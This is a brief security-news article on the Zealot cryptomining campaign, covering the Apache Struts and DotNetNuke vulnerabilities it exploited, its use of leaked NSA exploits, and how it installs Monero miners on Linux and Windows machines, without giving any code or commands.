Named Zealot Campaign, this malware targets Linux and Windows machines on an internal network. The most noticeable property of Zealot is the use of NSA’s EternalBlue and EternalSynergy exploits.
In case you’re wondering about the origins of the name Zealot, it’s based on the name of the zip file containing the Python scripts with NSA exploits, as found by the researchers at F5 Networks.
The two vulnerabilities exploited by this highly sophisticated and multi-staged attack are:
- CVE-2017-5638: Apache Struts Jakarta Multipart Parser attack
- CVE-2017-9822: DotNetNuke (DNN) content management system vulnerability
On Linux machines, the attackers use Python scripts from EmpireProject and install Monero miner. Zealot tries to fetch the script from a remote server using a “nohup” command, which allows it to run even after the shell is closed. If connecting to the server over TCP socket is failed, “curl” and “wget” are used to download the files.
On Windows platform, PowerShell is used to download and install the miner. For more stealth, the miner malware is downloaded as a DLL and injected into PowerShell process using DLL injection technique for more stealth.
As per the researchers, the hackers have made at least $8,500 from this attack. However, the total sum could be higher as hackers could be using other wallets as well. They also expect that the Zealot campaign could open new attack vectors for delivering malware on internal networks.